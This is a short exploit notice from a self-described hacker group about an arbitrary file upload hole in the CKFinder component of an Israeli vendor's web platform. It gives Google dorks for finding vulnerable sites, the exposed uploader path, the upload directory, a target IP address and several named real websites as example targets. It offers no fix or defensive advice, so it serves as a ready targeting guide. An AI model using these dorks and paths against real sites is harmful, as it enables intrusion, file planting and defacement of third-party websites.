################################################################################# # Tik-Tak Israel webPro Codeclient CKFinder Arbitrary File Upload Vulnerability # Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army # Vendor Homepage => tik-tak.co.il # Date: 22/05/2018 ################################################################################# Google Dork inurl:''/siteEn/index.aspx'' site:il Google Dork inurl:''/webPro/index.asp?codeclient='' Exploit => /webs/ckfinder/ckfinder.html Your File Here [ Path ] => /uploadfiles/null/.... ################################################################################# Example Sites and Target IP => 185.106.128.30 ubXahsa.co.il/webs/ckfinder/ckfinder.html gXoldapt.co.il/webs/ckfinder/ckfinder.html borochoXv-school.co.il/webs/ckfinder/ckfinder.html ################################################################################# Discovered By : KingSkrupellos from Cyberizm.Org Greetz : All Turkish Moslem Hackers and Cyberizm Digital Security Team